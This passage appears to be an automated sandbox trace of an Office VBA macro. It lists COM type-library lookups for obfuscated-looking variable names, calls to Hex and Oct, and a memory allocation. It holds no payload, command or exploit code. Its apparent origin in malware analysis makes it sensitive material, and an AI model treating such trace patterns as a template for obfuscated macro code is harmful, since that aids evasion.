CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61c1e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="Vo_ZUD") returned 7 [0068.976] ITypeComp:RemoteBind (in: This=0x665bd30, szName="Vo_ZUD", lHashVal=0x10e074, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.976] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Vo_ZUD") returned 0x10e074 [0068.976] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="Vo_ZUD" | out: _Dst="Vo_ZUD") returned 0x0 [0068.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="Vo_ZUD") returned 7 [0068.976] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.976] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="Vo_ZUD", lHashVal=0x10e074, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.976] IUnknown:Release (This=0x665ba50) returned 0xd [0068.976] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.976] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="Vo_ZUD", lHashVal=0x10e074, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.976] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.976] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.976] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="Vo_ZUD", lHashVal=0x10e074, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.976] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.976] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.976] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="Vo_ZUD", lHashVal=0x10e074, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.976] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61c1e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="Vo_ZUD") returned 7 [0068.976] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="Vo_ZUD", lHashVal=0x10e074, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.977] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.977] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61c1e | out: _Dst=0x67c2d40) returned 0x0 [0068.977] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Vo_ZUD") returned 0x105ade [0068.977] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_Vo_ZUD" | out: _Dst="_B_var_Vo_ZUD") returned 0x0 [0068.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_Vo_ZUD") returned 14 [0068.977] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.977] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_Vo_ZUD", lHashVal=0x105ade, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.977] IUnknown:Release (This=0x665ba50) returned 0xd [0068.977] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.977] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_Vo_ZUD", lHashVal=0x105ade, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.977] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.977] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.977] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_Vo_ZUD", lHashVal=0x105ade, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.977] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.977] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.977] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_Vo_ZUD", lHashVal=0x105ade, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.977] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.977] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.977] IUnknown:Release (This=0x665ba50) returned 0xd [0068.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1079e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_Vo_ZUD") returned 14 [0068.977] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_Vo_ZUD", lHashVal=0x105ade, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x56005f00720061, ppTypeComp=0x55005a00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x56005f00720061, ppTypeComp=0x55005a00000000, pDummy=0x0) returned 0x0 [0068.977] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61c1e | out: _Dst=0x144ec0) returned 0x0 [0068.977] ITypeComp:RemoteBind (in: This=0x665ba60, szName="k_kAA4", lHashVal=0x100b42, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61c46, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="k_kAA4") returned 7 [0068.978] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="k_kAA4", lHashVal=0x100b42, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61c46, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="k_kAA4") returned 7 [0068.978] ITypeComp:RemoteBind (in: This=0x665bd30, szName="k_kAA4", lHashVal=0x100b42, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="k_kAA4") returned 0x100b42 [0068.978] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="k_kAA4" | out: _Dst="k_kAA4") returned 0x0 [0068.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="k_kAA4") returned 7 [0068.978] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.978] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="k_kAA4", lHashVal=0x100b42, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.978] IUnknown:Release (This=0x665ba50) returned 0xd [0068.978] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.978] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="k_kAA4", lHashVal=0x100b42, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.978] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.978] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.978] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="k_kAA4", lHashVal=0x100b42, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.978] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.978] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.978] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="k_kAA4", lHashVal=0x100b42, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.978] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61c46, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="k_kAA4") returned 7 [0068.978] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="k_kAA4", lHashVal=0x100b42, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.978] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.978] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61c46 | out: _Dst=0x67c2d40) returned 0x0 [0068.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_k_kAA4") returned 0x1085eb [0068.978] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_k_kAA4" | out: _Dst="_B_var_k_kAA4") returned 0x0 [0068.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_k_kAA4") returned 14 [0068.979] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.979] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_k_kAA4", lHashVal=0x1085eb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.979] IUnknown:Release (This=0x665ba50) returned 0xd [0068.979] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.979] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_k_kAA4", lHashVal=0x1085eb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.979] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.979] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.979] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_k_kAA4", lHashVal=0x1085eb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.979] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.979] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.979] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_k_kAA4", lHashVal=0x1085eb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.979] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.979] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.979] IUnknown:Release (This=0x665ba50) returned 0xd [0068.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b107ce, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_k_kAA4") returned 14 [0068.979] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_k_kAA4", lHashVal=0x1085eb, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.979] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61c46 | out: _Dst=0x144ec0) returned 0x0 [0068.979] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0068.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.979] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.979] IUnknown:Release (This=0x665ba50) returned 0xd [0068.979] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.979] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.979] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.979] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.979] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.980] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.980] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.980] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.980] IUnknown:Release (This=0x665ba50) returned 0xd [0068.980] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.980] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.980] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.980] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.980] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.980] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.980] IUnknown:Release (This=0x665ba50) returned 0xd [0068.980] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.980] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.980] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.980] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.980] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.980] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.980] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.980] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.980] IUnknown:Release (This=0x665ba50) returned 0xd [0068.980] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.981] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.981] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.981] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4cd0000 [0068.981] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.981] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.981] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.981] IUnknown:Release (This=0x665ba50) returned 0xd [0068.982] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.982] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.982] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.982] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.982] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.982] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.982] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.982] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.982] IUnknown:Release (This=0x665ba50) returned 0xd [0068.982] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.982] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.982] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.982] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.982] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.982] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.982] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.982] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.982] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.982] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.982] IUnknown:Release (This=0x665ba50) returned 0xd [0068.982] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.983] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.983] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.983] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.983] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.983] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.983] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.983] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.983] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.983] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.983] IUnknown:Release (This=0x665ba50) returned 0xd [0068.983] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.983] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.983] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, 